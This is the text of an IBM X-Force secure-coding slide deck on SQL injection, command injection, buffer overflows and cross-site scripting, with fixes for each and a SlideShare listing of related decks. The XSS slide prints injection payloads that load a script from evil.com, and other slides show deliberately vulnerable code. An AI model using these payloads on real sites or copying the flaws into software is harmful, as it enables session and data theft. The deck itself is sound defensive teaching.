SlideShare a Scribd company logo
1 of 34
Inside the Mind of a Hacker
PAUL IONESCU, IBM X-FORCE ETHICAL HACKING TEAM
The Price of a Security Bug
INTRODUCTION
3 IBM Security
Functionality vs. Security
• As developers we want to create
highly functional software unrestricted
by the constraints of compliance
standards and tedious business
processes.
• Product security is incorrectly
perceived to be a burden on agile
software development.
• Security measures are often an
afterthought. Something you have to
do not something you want to do.
High Security
Low Security
High Functionality
Low Functionality
4 IBM Security
Developing Secure and Highly Functional Products is Possible
• If done early in the development
lifecycle security is not hard or costly
or conflicting with functionality.
• This can be achieved by educating
developers about threats.
High Security
Low Security
High Functionality
Low Functionality
5 IBM Security
What is a 0-day?
• A zero day is an unpublished security bug that has become known by a malicious party
• Commonly found in widely used software
6 IBM Security
Meet The Hackers Who Sell Spies The Tools To Crack Your PC
Vupen’s chief executive and lead hacker,
Chaouki Bekrar, says his company never
had any intention of telling Google its secret
techniques—certainly not for $60,000 in
chump change.”
ANDY GREENBERG, FORBES
The Security Vulnerability Business
• VUPEN – specializing in selling zero-days to the highest bidder
• Refused Pwn2Own $60k prize because the zero day was worth more undisclosed
7 IBM Security
Bug Poaching
• As uncovered recently by IBM X-Force, web application flaws used in
Ransomware style attacks.
• 30 enterprise organizations targeted last year.
• Attackers find and exploit website vulnerabilities.
• SQL Injection main method of attack.
• Once they obtain sensitive data attackers store it on a cloud service
• An email is sent to the organization that links to the data as proof that the
attacker has penetrated the network.
• Attackers ask for large payments, $30k+ to reveal the flaws
8 IBM Security
Types of Hackers
• White-hat hackers
̶ abide by the rules of responsible disclosure
̶ notify companies about vulnerabilities before making them public
̶ they don’t require any other reward than recognition for identifying the issue
̶ also referred to as ethical hackers
• Gray-hat hackers
̶ operate at the boundary of the law
̶ may be selling zero-day vulnerabilities to the bad guys or governments
• Black-hat hackers
̶ they are the cybercriminals
̶ use zero-days to break into systems and steal data.
9 IBM Security
What would a Hacker do?
• Understanding common programming flaws can help developers
prevent security issues
• Getting into the hacker mindset allows identifying abuse cases
• Implement software defenses while the software is written,
reducing cost and potentially avoiding thousands of dollars in
damages
• You can cost the black hat and grey hats lots of money because
they won’t have 0-days to sell!
10 IBM Security
The Top Programming Flaws
• Two highly used lists: OWASP Top 10 and MITRE (SANS) Top 25.
• The MITRE Top 25 focuses on software mistakes.
# CWE Name
1 CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
2 CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command
Injection')
3 CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
4 CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
SQL Injection
ATTACKING THE DATABASE
12 IBM Security
The 15 worst data security breaches of the 21st Century
134 million credit cards exposed
through SQL injection to install
spyware on Heartland's data
systems”
TAYLOR ARMERDING, WWW.CSOONLINE.COM
The Worst Data Breach of the 21st Century
• In comparison the OPM hack was 21.5 million records
• In 2012 SQLi responsible for more than half of all data breaches where the attack type has been
disclosed according to IBM X-Force
13 IBM Security
• User input is concatenated into a database query
• Attacker can manipulate the query practically injecting SQL code and altering the functionality of the
application
• Attackers can even execute OS commands
What is the programming flaw?
14 IBM Security
• Java Prepared Statement example, removing the need for concatenation
Preventing SQL Injection with Parameterized Statements
15 IBM Security
• Many user-provided parameters only need to be alphanumeric
• Input Validation whitelisting – alphanumeric by default, special characters by exception
• This reduces the attack surface for many types of attacks not only SQL Injection
• Implement an input validation framework
Adding Input Validation to Prevent Injection
OS Command Injection
ATTACKING THE SHELL
17 IBM Security
Web attacks build on Shellshock bug
One group used their Shellshock
botnet to bombard machines run by
Akamai with huge amounts of junk
data to try to knock them offline.
WWW.BBC.COM
The Famous 0-Day
• The 2014 Shellshock bug affected millions of servers around the world
• It has it’s own logo and Wikipedia article.
18 IBM Security
• The software concatenates or substitutes user input in a shell command.
• The example below is from the recently disclosed “ImageTragik” bug
• The %M part is substituted with a user-provided link. If a graphics file contains a link like this:
• The software executes:
What is the programming flaw?
19 IBM Security
• Use Input Validation
• Use parameterized functions where user input is being passed as parameters rather than one full
command
Preventing Command Injection
Vulnerable Using a Parameterized Function
Buffer Overflow
ATTACKING THE MEMORY
21 IBM Security
• A contest held during the CanSecWest security conference.
• Payouts topped $500,000 in 2014, with over a dozen new vulnerabilities found in Adobe
Reader, Adobe Flash Player, Internet Explorer 11, Google Chrome and Mozilla Firefox
• Many the zero-days disclosed at Pwn2Own are memory flaws — for example, CVE-
2012-1876, which is a buffer overflow in Internet Explorer, or CVE-2014-1303, a buffer
overflow in Apple Safari.
• Using such a vulnerability gives the attacker complete control over the victim’s machine.
• For these reason memory flaws found in common software are extremely valuable on the
black market.
Pwn2Own
22 IBM Security
Chinese Hackers Compromised Forbes.com Using IE, Flash Zero Days
Chinese APT group uses IE,
Flash zero days to compromise
Forbes.com
CHRIS BROOK, WWW.THREATPOST.COM
Using Software Flaws in Cyber Espionage
23 IBM Security
• Buffer Overflow is caused by improper memory management in C/C++ code
• Example simple C program that validates a password
• The code does not perform any validation on the length of the user input and does not bother ensuring
that sufficient memory was allocated to store the data coming from the user
What is the programming flaw?
24 IBM Security
• The table below shows the memory representation for our vulnerable program, where 0 stands for the
null character
• If the user enters more than 16 “A” characters in the verification password, it will override the
information stored at the 0x0111 address
Overflowing the buffer
25 IBM Security
• The attacker could overwrite the section in the memory that holds instructions, causing the execution
of arbitrary code as shown in the simplistic representation below.
Overflowing the program instructions
26 IBM Security
• Use safe functions. For example fgets (…) allows you to limit the size of the input; fgets (userPass,
16, stdin) resolves the problem.
• Ensure that the size of the input matches the size of the allocated memory.
• Avoid employing user input as format string arguments. This can lead to another memory flaw: format
string injection.
• Be careful both when allocating memory and when releasing memory. Use-after-free is another type of
memory flaw where the program keeps a reference to a location of the memory. Data at that location
can be arbitrarily modified.
• Use safe compiler flags. Such flags enable operating system defenses that make the insertion of
arbitrary commands very difficult. For example, Address Space Layout Randomization is a Windows
protection mechanism.
Protecting From Memory Attacks
Cross-Site Scripting
ATTACKING THE WEB PAGE
28 IBM Security
Earlier today we were informed of a
malicious site that was spreading links to
StalkDaily.com on Twitter without user
consent via a cross-site scripting
vulnerability.”
TWITTER COMMUNIQUE, APR 11,2009
The XSS Worm
• Malicious Cross-Site Scripting (XSS) script would spread itself from user to user by modifying
each user’s profile
• Other social networking sites notably affected by XSS worms. Samy worm affected 1 million
MySpace users in 2005
• Attack also commonly used to spoof websites and steal passwords. Major online retailers
targeted.
29 IBM Security
• XSS occurs when the web page inserts user input in an unsafe context
• Example unsafe contexts
̶ During server side page generation:
User name: <%=request.getParameter(“userName”)%>
User name: <script src=“https://evil.com/attack.js”></script>
̶ During server side page generation in a JavaScript attribute:
<body onload=“loadProfile(<%=request.getParameter(‘userid’)%>’’)”>
<body onload=“loadProfile(1);eval("var
a=document.createElement("script");a.src="https://evil.com/attack.js";document.bod
y.appendChild(a);")”>
̶ During server side page generation in a JavaScript snippet:
<script>loadProfile(<%=request.getParameter(‘userid’)%></script>”>
̶ Dynamic updates of innerHtml element attribute:
userNameDiv.innerHtml = user.Name;
• Due to the many areas that can be impacted by XSS it is difficult to defend and to miss.
What is the programming flaw?
30 IBM Security
• HtmlEncode user input before introducing it into unsafe context.
• Dynamic page updates should update the innerText / contentText attribute of html nodes
• Enforcing request token checks can prevent reflected cross-site scripting because the page will expire.
It will also prevent
• Use secure headers:
X-XSS-Protection: 1; mode=block – Enforces the browser XSS filter
Content-Security-Policy: script-src ‘self’ – Prevents loading external scripts
Protecting From Web Page Attacks
Catching Software Flaws
DEFENDING AGAINST THE HACKERS
32 IBM Security
• AppScan is an application
security scanner
• Tooling available both as a
cloud service and installable
• Interacts with the application
and conducts automated
attacks
• In the screenshot you can
see a scan of a server
vulnerable to SQL Injection
and OS Command Injection
Catching SQL Injection and Command Injection with Dynamic Analysis
33 IBM Security
• AppScan Source is a
Static Analysis tool also
available as a cloud
service.
• It examines the
program code to
identify security issues.
• In the screenshot you
can see a scan of the
vulnerable sample
program presented
earlier
Catching Buffer Overflow with Static Analysis
ibm.com/security
securityintelligence.com
xforce.ibmcloud.com
@ibmsecurity
youtube/user/ibmsecuritysolutions
© Copyright IBM Corporation 2016. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express
or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of,
creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these
materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and / or capabilities referenced in these materials may
change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and
other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks
or service marks of others.
Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise.
Improper access can result in information being altered, destroyed, misappropriated or misused or can result in damage to or misuse of your systems, including for use in attacks on others. No IT system or
product should be considered completely secure and no single product, service or security measure can be completely effective in preventing improper use or access. IBM systems, products and services are
designed to be part of a lawful, comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective.
IBM DOES NOT WARRANT THAT ANYSYSTEMS, PRODUCTS OR SERVICES ARE IMMUNE FROM, OR WILL MAKE YOUR ENTERPRISE IMMUNE FROM, THE MALICIOUS OR ILLEGAL CONDUCT
OF ANY PARTY.
FOLLOW US ON:
THANK YOU

More Related Content

What's hot

Cybersecurity trends - What to expect in 2023
Cybersecurity trends - What to expect in 2023Cybersecurity trends - What to expect in 2023
Cybersecurity trends - What to expect in 2023PECB
 
Security Awareness &amp; Training
Security Awareness &amp; TrainingSecurity Awareness &amp; Training
Security Awareness &amp; Trainingnovemberchild
 
Cyber Security – Challenges [Autosaved].pptx
Cyber Security – Challenges [Autosaved].pptxCyber Security – Challenges [Autosaved].pptx
Cyber Security – Challenges [Autosaved].pptxRambilashTudu
 
Cyber Crime and Cyber Security
Cyber Crime and Cyber SecurityCyber Crime and Cyber Security
Cyber Crime and Cyber SecuritySazed Salman
 
Cyber Security Awareness
Cyber Security AwarenessCyber Security Awareness
Cyber Security AwarenessRamiro Cid
 
TYPES OF HACKING
TYPES OF HACKINGTYPES OF HACKING
TYPES OF HACKINGSHERALI445
 
Cyber Security Presentation "It Will Never Happen To Me"
Cyber Security Presentation "It Will Never Happen To Me" Cyber Security Presentation "It Will Never Happen To Me"
Cyber Security Presentation "It Will Never Happen To Me" Simon Salter
 
Risk Management and Security in Strategic Planning
Risk Management and Security in Strategic PlanningRisk Management and Security in Strategic Planning
Risk Management and Security in Strategic PlanningKeyaan Williams
 
Cyber security talks 2019 by theko moima
Cyber security talks 2019 by theko moimaCyber security talks 2019 by theko moima
Cyber security talks 2019 by theko moimaTheko Moima
 
Cyber Security Introduction.pptx
Cyber Security Introduction.pptxCyber Security Introduction.pptx
Cyber Security Introduction.pptxANIKETKUMARSHARMA3
 
presentation on cyber crime and security
presentation on cyber crime and securitypresentation on cyber crime and security
presentation on cyber crime and securityAlisha Korpal
 
Introduction ethical hacking
Introduction ethical hackingIntroduction ethical hacking
Introduction ethical hackingVishal Kumar
 

What's hot (20)

Cybersecurity trends - What to expect in 2023
Cybersecurity trends - What to expect in 2023Cybersecurity trends - What to expect in 2023
Cybersecurity trends - What to expect in 2023
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
 
Security Awareness &amp; Training
Security Awareness &amp; TrainingSecurity Awareness &amp; Training
Security Awareness &amp; Training
 
Internet Security
Internet SecurityInternet Security
Internet Security
 
Cyber Security – Challenges [Autosaved].pptx
Cyber Security – Challenges [Autosaved].pptxCyber Security – Challenges [Autosaved].pptx
Cyber Security – Challenges [Autosaved].pptx
 
Cyber Crime and Cyber Security
Cyber Crime and Cyber SecurityCyber Crime and Cyber Security
Cyber Crime and Cyber Security
 
Phishing Presentation
Phishing Presentation Phishing Presentation
Phishing Presentation
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
 
Cyber security
 Cyber security Cyber security
Cyber security
 
Cyber Security Awareness
Cyber Security AwarenessCyber Security Awareness
Cyber Security Awareness
 
TYPES OF HACKING
TYPES OF HACKINGTYPES OF HACKING
TYPES OF HACKING
 
Cyber Security Presentation "It Will Never Happen To Me"
Cyber Security Presentation "It Will Never Happen To Me" Cyber Security Presentation "It Will Never Happen To Me"
Cyber Security Presentation "It Will Never Happen To Me"
 
Social Engineering
Social EngineeringSocial Engineering
Social Engineering
 
Risk Management and Security in Strategic Planning
Risk Management and Security in Strategic PlanningRisk Management and Security in Strategic Planning
Risk Management and Security in Strategic Planning
 
Cyber security talks 2019 by theko moima
Cyber security talks 2019 by theko moimaCyber security talks 2019 by theko moima
Cyber security talks 2019 by theko moima
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Cyber Security Introduction.pptx
Cyber Security Introduction.pptxCyber Security Introduction.pptx
Cyber Security Introduction.pptx
 
presentation on cyber crime and security
presentation on cyber crime and securitypresentation on cyber crime and security
presentation on cyber crime and security
 
Cyber safety
Cyber safetyCyber safety
Cyber safety
 
Introduction ethical hacking
Introduction ethical hackingIntroduction ethical hacking
Introduction ethical hacking
 

Viewers also liked

Litehouse Social Marketing-Campaign
Litehouse Social Marketing-CampaignLitehouse Social Marketing-Campaign
Litehouse Social Marketing-CampaignLitehouse
 
Hersh aangan e brochure
Hersh aangan e brochure Hersh aangan e brochure
Hersh aangan e brochure tridhaatuinfra
 
Agora: general-purpose blockchain platform
Agora: general-purpose blockchain platformAgora: general-purpose blockchain platform
Agora: general-purpose blockchain platformpizyumi
 
お天気情報をBotで通知する(Bluemix OpenWhisk)
お天気情報をBotで通知する(Bluemix OpenWhisk)お天気情報をBotで通知する(Bluemix OpenWhisk)
お天気情報をBotで通知する(Bluemix OpenWhisk)rina0521
 
OpenWhisk Introduction
OpenWhisk IntroductionOpenWhisk Introduction
OpenWhisk IntroductionIoana Baldini
 
Hydrogen Induced Cracking
Hydrogen Induced CrackingHydrogen Induced Cracking
Hydrogen Induced Crackingdenzil22
 
Build a cloud native app with OpenWhisk
Build a cloud native app with OpenWhiskBuild a cloud native app with OpenWhisk
Build a cloud native app with OpenWhiskDaniel Krook
 
IBM Design Thinking & the Bluemix Garage Method
IBM Design Thinking & the Bluemix Garage Method IBM Design Thinking & the Bluemix Garage Method
IBM Design Thinking & the Bluemix Garage Method Dev_Events
 
Google for Mobile: コンテナで作るモバイル バックエンド - 福田 潔
Google for Mobile:  コンテナで作るモバイル バックエンド - 福田 潔Google for Mobile:  コンテナで作るモバイル バックエンド - 福田 潔
Google for Mobile: コンテナで作るモバイル バックエンド - 福田 潔Google Cloud Platform - Japan
 
OpenWhisk Serverless への期待
OpenWhisk Serverless への期待OpenWhisk Serverless への期待
OpenWhisk Serverless への期待Hideaki Tokida
 
E-commerce product classification with deep learning
E-commerce product classification with deep learning E-commerce product classification with deep learning
E-commerce product classification with deep learning Christopher Bonnett Ph.D
 
今なぜサーバーレスなのか
今なぜサーバーレスなのか今なぜサーバーレスなのか
今なぜサーバーレスなのか真吾 吉田
 
OpenStack Magnum 2016-08-04
OpenStack Magnum 2016-08-04OpenStack Magnum 2016-08-04
OpenStack Magnum 2016-08-04Adrian Otto
 

Viewers also liked (16)

Litehouse Social Marketing-Campaign
Litehouse Social Marketing-CampaignLitehouse Social Marketing-Campaign
Litehouse Social Marketing-Campaign
 
MAE - Informe diario 06-01-2016
MAE - Informe diario 06-01-2016MAE - Informe diario 06-01-2016
MAE - Informe diario 06-01-2016
 
Hersh aangan e brochure
Hersh aangan e brochure Hersh aangan e brochure
Hersh aangan e brochure
 
Aumkaar ebrochure
Aumkaar ebrochureAumkaar ebrochure
Aumkaar ebrochure
 
Study Strategies
Study StrategiesStudy Strategies
Study Strategies
 
Agora: general-purpose blockchain platform
Agora: general-purpose blockchain platformAgora: general-purpose blockchain platform
Agora: general-purpose blockchain platform
 
お天気情報をBotで通知する(Bluemix OpenWhisk)
お天気情報をBotで通知する(Bluemix OpenWhisk)お天気情報をBotで通知する(Bluemix OpenWhisk)
お天気情報をBotで通知する(Bluemix OpenWhisk)
 
OpenWhisk Introduction
OpenWhisk IntroductionOpenWhisk Introduction
OpenWhisk Introduction
 
Hydrogen Induced Cracking
Hydrogen Induced CrackingHydrogen Induced Cracking
Hydrogen Induced Cracking
 
Build a cloud native app with OpenWhisk
Build a cloud native app with OpenWhiskBuild a cloud native app with OpenWhisk
Build a cloud native app with OpenWhisk
 
IBM Design Thinking & the Bluemix Garage Method
IBM Design Thinking & the Bluemix Garage Method IBM Design Thinking & the Bluemix Garage Method
IBM Design Thinking & the Bluemix Garage Method
 
Google for Mobile: コンテナで作るモバイル バックエンド - 福田 潔
Google for Mobile:  コンテナで作るモバイル バックエンド - 福田 潔Google for Mobile:  コンテナで作るモバイル バックエンド - 福田 潔
Google for Mobile: コンテナで作るモバイル バックエンド - 福田 潔
 
OpenWhisk Serverless への期待
OpenWhisk Serverless への期待OpenWhisk Serverless への期待
OpenWhisk Serverless への期待
 
E-commerce product classification with deep learning
E-commerce product classification with deep learning E-commerce product classification with deep learning
E-commerce product classification with deep learning
 
今なぜサーバーレスなのか
今なぜサーバーレスなのか今なぜサーバーレスなのか
今なぜサーバーレスなのか
 
OpenStack Magnum 2016-08-04
OpenStack Magnum 2016-08-04OpenStack Magnum 2016-08-04
OpenStack Magnum 2016-08-04
 

Similar to Uncover What's Inside the Mind of a Hacker

Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...IBM Security
 
Best practices to secure Windows10 with already included features
Best practices to secure Windows10 with already included featuresBest practices to secure Windows10 with already included features
Best practices to secure Windows10 with already included featuresAlexander Benoit
 
Expand Your Control of Access to IBM i Systems and Data
Expand Your Control of Access to IBM i Systems and DataExpand Your Control of Access to IBM i Systems and Data
Expand Your Control of Access to IBM i Systems and DataPrecisely
 
Controlling Access to IBM i Systems and Data
Controlling Access to IBM i Systems and DataControlling Access to IBM i Systems and Data
Controlling Access to IBM i Systems and DataPrecisely
 
Built-in Security Mindfulness for Software Developers
Built-in Security Mindfulness for Software DevelopersBuilt-in Security Mindfulness for Software Developers
Built-in Security Mindfulness for Software DevelopersPhú Phùng
 
Defending Your IBM i Against Malware
Defending Your IBM i Against MalwareDefending Your IBM i Against Malware
Defending Your IBM i Against MalwarePrecisely
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015   sebaSolvay secure application layer v2015   seba
Solvay secure application layer v2015 sebaSebastien Deleersnyder
 
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
An Introduction of SQL Injection, Buffer Overflow & Wireless AttackAn Introduction of SQL Injection, Buffer Overflow & Wireless Attack
An Introduction of SQL Injection, Buffer Overflow & Wireless AttackTechSecIT
 
Software security (vulnerabilities) and physical security
Software security (vulnerabilities) and physical securitySoftware security (vulnerabilities) and physical security
Software security (vulnerabilities) and physical securityNicholas Davis
 
Software Security (Vulnerabilities) And Physical Security
Software Security (Vulnerabilities) And Physical SecuritySoftware Security (Vulnerabilities) And Physical Security
Software Security (Vulnerabilities) And Physical SecurityNicholas Davis
 
WEB APPLICATION SECURITY
WEB APPLICATION SECURITYWEB APPLICATION SECURITY
WEB APPLICATION SECURITYyashwanthlavu
 
The Year the Internet Fell Apart
The Year the Internet Fell ApartThe Year the Internet Fell Apart
The Year the Internet Fell ApartIBM Security
 
The cyber house of horrors - securing the expanding attack surface
The cyber house of horrors -  securing the expanding attack surfaceThe cyber house of horrors -  securing the expanding attack surface
The cyber house of horrors - securing the expanding attack surfaceJason Bloomberg
 
Re-defining Endpoint Protection: Preventing Compromise in the Face of Advance...
Re-defining Endpoint Protection: Preventing Compromise in the Face of Advance...Re-defining Endpoint Protection: Preventing Compromise in the Face of Advance...
Re-defining Endpoint Protection: Preventing Compromise in the Face of Advance...IBM Security
 
Domain 5 of the CEH: Web Application Hacking
Domain 5 of the CEH: Web Application HackingDomain 5 of the CEH: Web Application Hacking
Domain 5 of the CEH: Web Application HackingShivamSharma909
 
Do You Write Secure Code? by Erez Metula
Do You Write Secure Code? by Erez MetulaDo You Write Secure Code? by Erez Metula
Do You Write Secure Code? by Erez MetulaAlphageeks
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelinesZakaria SMAHI
 
DEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.pptDEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.pptschwarz10
 

Similar to Uncover What's Inside the Mind of a Hacker (20)

Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
 
Best practices to secure Windows10 with already included features
Best practices to secure Windows10 with already included featuresBest practices to secure Windows10 with already included features
Best practices to secure Windows10 with already included features
 
Expand Your Control of Access to IBM i Systems and Data
Expand Your Control of Access to IBM i Systems and DataExpand Your Control of Access to IBM i Systems and Data
Expand Your Control of Access to IBM i Systems and Data
 
Controlling Access to IBM i Systems and Data
Controlling Access to IBM i Systems and DataControlling Access to IBM i Systems and Data
Controlling Access to IBM i Systems and Data
 
Built-in Security Mindfulness for Software Developers
Built-in Security Mindfulness for Software DevelopersBuilt-in Security Mindfulness for Software Developers
Built-in Security Mindfulness for Software Developers
 
Defending Your IBM i Against Malware
Defending Your IBM i Against MalwareDefending Your IBM i Against Malware
Defending Your IBM i Against Malware
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015   sebaSolvay secure application layer v2015   seba
Solvay secure application layer v2015 seba
 
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
An Introduction of SQL Injection, Buffer Overflow & Wireless AttackAn Introduction of SQL Injection, Buffer Overflow & Wireless Attack
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
 
Software security (vulnerabilities) and physical security
Software security (vulnerabilities) and physical securitySoftware security (vulnerabilities) and physical security
Software security (vulnerabilities) and physical security
 
Software Security (Vulnerabilities) And Physical Security
Software Security (Vulnerabilities) And Physical SecuritySoftware Security (Vulnerabilities) And Physical Security
Software Security (Vulnerabilities) And Physical Security
 
WEB APPLICATION SECURITY
WEB APPLICATION SECURITYWEB APPLICATION SECURITY
WEB APPLICATION SECURITY
 
The Year the Internet Fell Apart
The Year the Internet Fell ApartThe Year the Internet Fell Apart
The Year the Internet Fell Apart
 
The cyber house of horrors - securing the expanding attack surface
The cyber house of horrors -  securing the expanding attack surfaceThe cyber house of horrors -  securing the expanding attack surface
The cyber house of horrors - securing the expanding attack surface
 
Re-defining Endpoint Protection: Preventing Compromise in the Face of Advance...
Re-defining Endpoint Protection: Preventing Compromise in the Face of Advance...Re-defining Endpoint Protection: Preventing Compromise in the Face of Advance...
Re-defining Endpoint Protection: Preventing Compromise in the Face of Advance...
 
CEH Domain 5.pdf
CEH Domain 5.pdfCEH Domain 5.pdf
CEH Domain 5.pdf
 
Domain 5 of the CEH: Web Application Hacking
Domain 5 of the CEH: Web Application HackingDomain 5 of the CEH: Web Application Hacking
Domain 5 of the CEH: Web Application Hacking
 
Do You Write Secure Code? by Erez Metula
Do You Write Secure Code? by Erez MetulaDo You Write Secure Code? by Erez Metula
Do You Write Secure Code? by Erez Metula
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
 
DEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.pptDEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.ppt
 
Web security 2012
Web security 2012Web security 2012
Web security 2012
 

More from IBM Security

Automation: Embracing the Future of SecOps
Automation: Embracing the Future of SecOpsAutomation: Embracing the Future of SecOps
Automation: Embracing the Future of SecOpsIBM Security
 
Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...
Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...
Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...IBM Security
 
Bridging the Gap between Privacy and Security: Using Technology to Manage Com...
Bridging the Gap between Privacy and Security: Using Technology to Manage Com...Bridging the Gap between Privacy and Security: Using Technology to Manage Com...
Bridging the Gap between Privacy and Security: Using Technology to Manage Com...IBM Security
 
Integrated Response with v32 of IBM Resilient
Integrated Response with v32 of IBM ResilientIntegrated Response with v32 of IBM Resilient
Integrated Response with v32 of IBM ResilientIBM Security
 
The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...
The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...
The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...IBM Security
 
Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...
Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...
Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...IBM Security
 
Accelerating SOC Transformation with IBM Resilient and Carbon Black
Accelerating SOC Transformation with IBM Resilient and Carbon BlackAccelerating SOC Transformation with IBM Resilient and Carbon Black
Accelerating SOC Transformation with IBM Resilient and Carbon BlackIBM Security
 
How to Build a Faster, Laser-Sharp SOC with Intelligent Orchestration
How to Build a Faster, Laser-Sharp SOC with Intelligent OrchestrationHow to Build a Faster, Laser-Sharp SOC with Intelligent Orchestration
How to Build a Faster, Laser-Sharp SOC with Intelligent OrchestrationIBM Security
 
Are You Ready to Move Your IAM to the Cloud?
Are You Ready to Move Your IAM to the Cloud?Are You Ready to Move Your IAM to the Cloud?
Are You Ready to Move Your IAM to the Cloud?IBM Security
 
Orchestrate Your Security Defenses to Optimize the Impact of Threat Intelligence
Orchestrate Your Security Defenses to Optimize the Impact of Threat IntelligenceOrchestrate Your Security Defenses to Optimize the Impact of Threat Intelligence
Orchestrate Your Security Defenses to Optimize the Impact of Threat IntelligenceIBM Security
 
Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...
Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...
Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...IBM Security
 
Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...
Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...
Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...IBM Security
 
Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...
Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...
Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...IBM Security
 
WannaCry Ransomware Attack: What to Do Now
WannaCry Ransomware Attack: What to Do NowWannaCry Ransomware Attack: What to Do Now
WannaCry Ransomware Attack: What to Do NowIBM Security
 
How to Improve Threat Detection & Simplify Security Operations
How to Improve Threat Detection & Simplify Security OperationsHow to Improve Threat Detection & Simplify Security Operations
How to Improve Threat Detection & Simplify Security OperationsIBM Security
 
Mobile Vision 2020
Mobile Vision 2020Mobile Vision 2020
Mobile Vision 2020IBM Security
 
Retail Mobility, Productivity and Security
Retail Mobility, Productivity and SecurityRetail Mobility, Productivity and Security
Retail Mobility, Productivity and SecurityIBM Security
 
Close the Loop on Incident Response
Close the Loop on Incident ResponseClose the Loop on Incident Response
Close the Loop on Incident ResponseIBM Security
 
Orchestrate Your Security Defenses; Protect Against Insider Threats
Orchestrate Your Security Defenses; Protect Against Insider Threats Orchestrate Your Security Defenses; Protect Against Insider Threats
Orchestrate Your Security Defenses; Protect Against Insider Threats IBM Security
 

More from IBM Security (20)

Automation: Embracing the Future of SecOps
Automation: Embracing the Future of SecOpsAutomation: Embracing the Future of SecOps
Automation: Embracing the Future of SecOps
 
Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...
Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...
Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...
 
Bridging the Gap between Privacy and Security: Using Technology to Manage Com...
Bridging the Gap between Privacy and Security: Using Technology to Manage Com...Bridging the Gap between Privacy and Security: Using Technology to Manage Com...
Bridging the Gap between Privacy and Security: Using Technology to Manage Com...
 
Integrated Response with v32 of IBM Resilient
Integrated Response with v32 of IBM ResilientIntegrated Response with v32 of IBM Resilient
Integrated Response with v32 of IBM Resilient
 
The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...
The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...
The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...
 
Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...
Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...
Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...
 
Accelerating SOC Transformation with IBM Resilient and Carbon Black
